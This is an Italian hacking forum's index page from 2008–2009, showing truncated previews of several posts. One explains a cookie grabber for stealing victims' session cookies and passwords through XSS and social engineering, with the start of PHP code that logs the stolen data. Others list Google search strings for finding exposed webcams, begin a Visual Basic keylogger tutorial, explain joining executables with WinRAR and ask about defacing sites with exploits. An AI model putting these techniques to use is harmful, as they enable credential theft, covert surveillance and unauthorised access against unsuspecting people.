Hacking Easy - [ Hacking - Programmazione - Trucchi - Msn - Off topic

Partecipare all'Ezine UnderAttHack, L'E-zine di Hacking-Easy

Track this topic | Email this topic | Print this topic

Posted on 23/6/2009, 18:36 by: vikkio88

UnderAttHack, e-zine di informatica e sicurezza, cerca persone capaci e interessate a proporre qualcosa di innovativo e interessante sugli argomenti informatica e programmazione.
Come potete vedere dai numeri precedenti, gli argomenti trattati sono i più vari, dalla sicurezza alla programmazione, al social-engineering, all'etica vera e propria.
Uno spazio non ancora presente ma in lavorazione è ad esempio una sezione dedicata all'hacker-art (digital-art, cyber-punk ecc.)
Chi fosse interessato a inviare un articolo può farlo tramite l'indirizzo email: underatthack[at]gmail.com
Allo stesso indirizzo ci si può rivolgere per maggiori informazioni su altre forme di collaborazione.
...ma a questo punto fate prima a rivolgervi direttamente a me via MP o via MSN o via mail... xD
Ovviamente la redazione si riserva di non pubblicare articoli inutili/lamerosi/bimbominkiosi.

Per ulteriori informazioni ==>

Comments: 0 | Views: 4

Last Post by: vikkio88 (23/6/2009, 18:36)

Cookie grabber

Track this topic | Email this topic | Print this topic

Posted on 25/2/2009, 23:08 by: k3rn3l

Intanto cos'è un cookie:

Altro non è che un file di testo contenente determinati dati e viene inviato dal server web in contemporanea alla pagina internet e successivamente salvato in una cartella del vostro browser.
Servono per far si che il borwser possa identificarli in modo da associarli al server che li ha generati. Di conseguenza possiamo dire che ogni server prosuce il suo cookie per permetterne poi il riconoscimento quando ci si ricollega.

Inoltre un cookie memorizza cnhe tutti i dati inseriti nei form, come username e password per accedere ad aree riservate di siti. avviene più precisamente che dopo aver inserito i dati di accesso ad esempio e dato l'ok, il server ci genera il cookie contenente tali dati in modo da esser riconosciuti dal server anche al prossimo accesso...si intuisce che qualora settassimo il nostro browser in modo da rifiutare i cookie, non ci si potrebbe autenticare su nessun sito.

Qundi vien generato un cookie ogni volta che visitate qualunque sito e vengon salvate tutte le impostazioni e operazioni che fate.
Capite allora la grossa importanza di un cookie e il "potere" che esso ha!
E a questo punto sorge la domanda: e se qualcuno si impossessasse dei miei cookie? meglio ancora dei cookie con dati di accesso...?
E qui ecco che subentra appunto il cookie grabber!!!

Cookie grabber:
Catturando dei cookie con un cookie grabber, si può risalire quindi a tante informazioni personali delle vittime alle quali li abbiamo sottratti.
Bastano poche righe di codice in php per creare un cookie grabber e implementarlo e utilizzarlo in diversi modi...un esempio e con una XSS.

Scriviamo queste poche righe di codice su un qualsiasi editor di testo, salviamo il file nel formato .php e lo uppiamo sul nostro spazio web. A questo punto basta indirizzare in qualche modo la vittima alla pagina web alla quale è collegato il cookie grabber (con un po' di social engineering) e saranno catturati i suoi cookie con tutti i dati...anche username e password...che saranno salvati su un file .txt che si trova sempre nel nostro spazio web (nell'esempio saranno salvati nel file "file.txt").
Le password non saranno esplicite però, ma in "hash md5" (cioè criptate con questa chiave)...ma basta un semplice programma o uno dei tanti siti web che offrono la conversione da questa forma criptata in forma chiara e leggibile, ed è fatta.

Esempio di un cookie grabber:

CODICE

[/CODE]
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('file.txt', 'a');
fwrite($fp, '...

Read the entire post...

Comments: 3 | Views: 57

Last Post by: vikkio88 (28/2/2009, 14:50)

Super megaupload, Come superare i controlli

Track this topic | Email this topic | Print this topic

Posted on 25/2/2009, 18:43 by: grisu_94

Spesso quando si vuole scaricare da un sito un file si viene rimandati a megaupload
Il servizio è molto utile ma per chi non ha il premium diventa un casino

Parte I (informazioni generali)

A)Differenza tra normali,user,premium
Qua sotto farò una piccola tabella con le principali differenze
<carattteristica>--------------------<normale>-------<user>-------<premium>
Max download contemporanei: ---------1-----------------1--------------infiniti
Tempo di attesa: ----------------------45 sec----------25 sec------------0 sec
Pubblicità: -----------------------------minimo----------medio----------massimo
Priorità:-------------------------------- zero---------------minimo------massimo

C)Come rimediare
Un modo per superare alcuni di questi problemi esiste:
è una combinazione tra firefox e greasemonkey

C)cos'è grasemonkey
è un estensione di firefox che permette di eseguire degli script creati dall'utente o terzi con lo scopo di modificare durante il download delle pagine web le pagine stesse
1)utilizzi
viene usato per migliorare le pagine web togliendo la pubblicità, creando tabelle di comparazione (sopratttutto nei motori di ricerca e nei brower games) o collegamenti veloci oltre che a cambiare l'aspetto grafico

Parte II (all'attaco!)

1)Procurarsi il materiale
Dobbiamo inanzitutto avere i requisiti fondamentali
-firefox Pagina ufficiale
-greasemonkey download da firefox add-ons
-Estensione megaupload helper Pagina in userscript

2)iniziamo! (è facilissimo)
-Installiamo firefox
-dopo l'installazione si avvierà in automatico quindi cliccate all'indirizzo per greasemonkey e cliccate su download
-aspettate i 3 secondi e cliccate su installa
-riavviate firefox
ora in basso a destra sulla barra di stato dovrbbe esserci l'icona di una scimmietta
-installate lo script sopra indicato (megaupload helper)
Per installarolo dovrebbe apparire una scermata simile a quella di prima ma con l'icona della scimmietta anche qui cliccate su installa

Fatto!!!

Ora cliccando su un link a megaupload potrete scaricare anche 30 download insieme senza aspettare un secondo
Lo svantaggio è che la parte grafica della pagina verrà cancellata, ma infondo non è che sia cosi utile
!!!!!Attenzione!!&...

Read the entire post...

Comments: 5 | Views: 200

Last Post by: grisu_94 (27/2/2009, 16:43)

Cookie Manipulation

Track this topic | Email this topic | Print this topic

Posted on 13/10/2008, 17:10 by: ZeroKool

Cosa sono i cookie

Il cookie sono file di testo che contengono informazioni sull’utente che visita un sito, essi possono essere impostati per sessione rimanendo nella memoria di sistema fino alla chiusura del browser oppure, possono avere una determinata scadenza o essere permanenti ed allora vengono memorizzati in una apposita cartella del disco fisso locale sotto forma di file di testo in modo da Poter essere successivamente recuperati dal sito.

Come funzionano

I cookie sono spesso usati dagli sviluppatori web, perchè danno la possibilità di gestire informazioni senza bisogno di memorizzarle sul server stesso, ma in maniera distribuita sui client, preservando quindi le risorse del server. I siti Internet che li utilizzano, ne fanno uso, solitamente, oltre che per controllare quante volte uno stesso utente accede al sito web, anche per memorizzare informazioni che possano rendere migliore la navigazione di una persona all'interno di uno stesso sito, ad esempio possono essere creati per conservare informazioni di login per accesso ad un forum o ad un’area privata.

I Parametri:
I cookie sono caratterizzati dagli attributi:

CODICE

* Nome/Valore:

possiamo pensare ad esso come ad una variabile, obbligatorio.

* Scadenza (expiration date):

è opzionale ed indica la scadenza del cookie rispetto al timestamp nel quale lo stesso viene creato, può essere espressa come data, come numero di giorni, come NOW (adesso) e come NEVER (mai). L'utilizzo di una scadenza NOW elimina il cookie dal sistema ospite in quanto il cookie scade nel momento in cui viene creato o aggiornato. L'utilizzo di una scadenza NEVER permette la creazione di cookies non soggetti a scadenza.

* Sicuro (secure):

è un attributo opzionale che indica se il cookie debba essere trasmesso criptato HTTPS.

* Percorso (path):

è opzionale e definisce il sottoinsieme di indirizzi url a cui il cookie può essere applicato.

* Dominio (domain):

indica il dominio a cui il cookie si riferisce.

Vulnerabilità dei Cookie

La vulnerabilità dei cookie è dovuta proprio alla loro semplicità, infatti i cookie non sono altro comuni file di testo quindi modificare il loro contenuto non dovrebbe essere un operazione molto difficile. La tecnica che ba...

Read the entire post...

Comments: 4 | Views: 206

Last Post by: kokakola92 (13/10/2008, 19:29)

domanda sugli exploits

Track this topic | Email this topic | Print this topic

Posted on 29/9/2008, 21:44 by: rELypSE

visto che dell argomento defacing me ne intendo molto poco volevo farvi alcune domande...
la prima è questa: ho notato in giro che gli exploits possono essere in freebsd, linux,windows ecc. ma quello che mi domando è ma cosa centrano i sistemi operativi con i siti da defacciare??
e poi un altra domanda... ho fatto un giro su milw0rm e nn riesco a capire come guardando un exploits riesco a trarne dei risultati capendo di quale piattaforma dei siti e di quale vulnerabilità si occupa...
potete aiutarmi??

Comments: 5 | Views: 97

Last Post by: adsmanet (12/10/2008, 14:34)

Due siti importanti, Free log-in & 10 minuti mail (

1 2 )

Track this topic | Email this topic | Print this topic

Posted on 28/9/2008, 11:17 by: ¤Uriel¤

Ciao raga,
Questi due siti sono davvero utili!
Il primo:

"Bugmenot":
http://www.bugmenot.com/

Fornisce i dati di log-in di qualsiasi sito, potete anche voi aggiungere un account. ( Mi raccomando NON cambiate le password agli account!!! )

Quest'altro sito invece:

10 Minute Mail:
http://10minutemail.com/10MinuteMail/index.html

Fornisce un indirizzo di posta, valido per soli 10 minuti. Davvero utile se dovete fare una registrazione veloce, e non volete fornire la vostra vera mail!

Bhè divertitevi!

Comments: 15 | Views: 313

Last Post by: mattos (19/10/2008, 19:48)

videocamere in google

Track this topic | Email this topic | Print this topic

Posted on 27/8/2008, 17:38 by: kratos_18

con delle semplice stringhe possiamo vedere alcune videocamere
basta metterle nel motore di ricerca
ecco le stringhe

CODICE

inurl:”ViewerFrame?Mode=”
-
inurl:view/indexFrame.shtml
-
inurl:”axis-cgi/mjpg”
-
inurl:”MultiCameraFrame?Mode=”

Comments: 3 | Views: 166

Last Post by: kratos_18 (28/8/2008, 09:30)

WinRar Joiner, Unire due o più File

Track this topic | Email this topic | Print this topic

Posted on 24/8/2008, 14:17 by: ¤Uriel¤

Vi è mai capitato di dover unire due o più eseguibili? Magari avete usato strani programmi joiner...
Meglio usare WinRar!!!
Siccome mi scoccio di scrivere, vi posto una bella immagine!

SPOILER (clicca per visualizzare)

Credo sia abbastanza chiara no? Se avete dubbi postate!

Comments: 6 | Views: 139

Last Post by: MRK259 (7/9/2008, 11:57)

Creare un keylogger, esempio

Track this topic | Email this topic | Print this topic

Posted on 10/8/2008, 19:03 by: adsmanet

IL VB E LA TASTIERA

#############################-Disclaimer Legale-#############################
Tutto il materiale qui presente è stato scritto a puro scopo didattico, l'autore non si assume nessuna responsabilità per le informazioni qui riportate. Questo materiale può essere divulgato, modificato e chi vuole può pure metterci il prorpio nome, la gloria non fa per me!
######################

COSA è RICHIESTO:

-una conoscenza di base del VB
-il compilatore per VB
-la capacità di dichiarare un'API
-un po' di fantasia

Se almeno una volta nella vostra vita vi è venuta la voglia di scrivervi un keylogger o di simualre la pressione di un tasto per chissà quale scopo allora questa guida fa per voi!

PARAGRAFI:

1-SIMULARELA PRESSIONE DEI TASTI
2-CONTROLLARE I TASTI

--------------------> SIMULARE LA PRESSIONE DEI TASTI <----------------------

Se per qualche losco progetto avete la necessità di far pemere un tasto su un pc senza avervi l'accesso fisico, e se magari sul quel pc gira Windows beh, prendete il vostro compilatore e dateci dentro perchè col Vb questa operazione è estremamente semplice. Le uniche cose da utilizzare saranno un API e qualche costante. Ma andiamo con ordine.
Dichiariamo la nostra funzione:

Declare Sub keybd_event Lib "user32" (ByVal bVk As Byte, ByVal bScan As Byte, ByVal dwFlags As Long, ByVal dwExtraInfo As Long)

e due costanti:

Const KEYEVENTF_EXTENDEDKEY = &H1
Const KEYEVENTF_KEYUP = &H2

Queste due costabti indicano rispetivamente la pressione del tasto (KeyDown) e il suo rilascio (KeyUp) infatti per realizzare la pressione di un tasto bisogna effetivamente farla nel codice: prima si preme e poi si rilascia il tasto, solo allora la pressione sarà caompleta. Nell'API dichiarata sopra bVk indica il tasto da premere, bScan il codice per la scansione del testo (settatelo a 0), dFlags se il tasto sarà premuto o rilasciato mentre dwExtraInfo non viene utilizzato dal VB (mettete a 0 pure questo). Detto questo sareste quasi pronti per simulare la pressione di un tasto, vi amnca solo il valore da passare a bVk. Questa variabile che conterrà il bottone da premere richiede una costante di VB relativa alla tastiera. Di seguito riporto alcune delle costanti più usate:

Costante Tasto Valore

vbKeyCancel Tasto ANNULLA 3
vbKeyBack Tasto BACKSPACE 8
vbKeyTab Tasto TAB 9
vbKeyReturn Tasto INVIO 13
vbKeyShift Tasto MAIUSC 16
vbKeyControl Tasto CTRL 17
vbKeyMenu Tasto MENU 18
vbKeyCapital Tasto BLOC MAIUSC 20
vbKeyEscape Tasto ESC 27
vbKeySpace BARRA SPAZIATRICE 32

mentre per le lettere dell'alfabeto si usano semplicemnte vbKeyA o vbKeyB e così via mentre il loro valore equivale al codice ASCII della laettera. Stesso ragionamento vale per i tsti funzione, vbKeyF1 equivarrà a F1 e vbKeyF6 equivarrà a F6. I valori dei ta...

Read the entire post...

Comments: 0 | Views: 1235

Last Post by: adsmanet (10/8/2008, 19:03)

Animoticon & Password, Leggenda o realtà?

Track this topic | Email this topic | Print this topic

Posted on 4/8/2008, 15:30 by: ¤Uriel¤

Tempo fa, King-Lion ha annunciato che riusciva a prelevare la chiave di registro ( tra l'altro sbagliata ) delle password di msn.
Ho provato a seguire quello che ha scritto, e davvero ho trovato ciò che King diceva.
I problemi sono questi:
1) Non sconosco il Falsh
2) Non credo che tramite Falsh si possa prelevare la chiave di registro ( Visto che non si possono far partire file eseguibili...)
3) Mi sa che si deve cambiare qualcosa anche nei file .xml...

Avete qualche info?
Io avevo pensato a qualcosa tipo far aprire una pag web o altro bho...

Comments: 13 | Views: 511

Last Post by: ¤Uriel¤ (27/8/2008, 17:27)

Hackingeasy
Gemellaggi_di_Hackingeasy

Affiliati di Hackingeasy
Per richieste Affiliazioni qui

Link Utili
Forum Progetto UnderAttHack Dove presentarsi Per Affiliarsi Hackingeasy Regolamento Proponiti nello Staff
Progetto UnderAttHack in attuazione

ATTENZIONE: Hackingeasy si è trasferito ad un nuovo indirizzo: HACKINGEASY.TK

Hackingeasy si è trasferito ad un nuovo indirizzo:

http://hackingeasy.tk

Venite a trovarci numerosi!

ATTENZIONE: Hackingeasy si è trasferito ad un nuovo indirizzo: HACKINGEASY.TK

Hackingeasy si è trasferito ad un nuovo indirizzo: http://hackingeasy.tk Venite a trovarci numerosi!

Hackingeasy si è trasferito ad un nuovo indirizzo:

http://hackingeasy.tk

Venite a trovarci numerosi!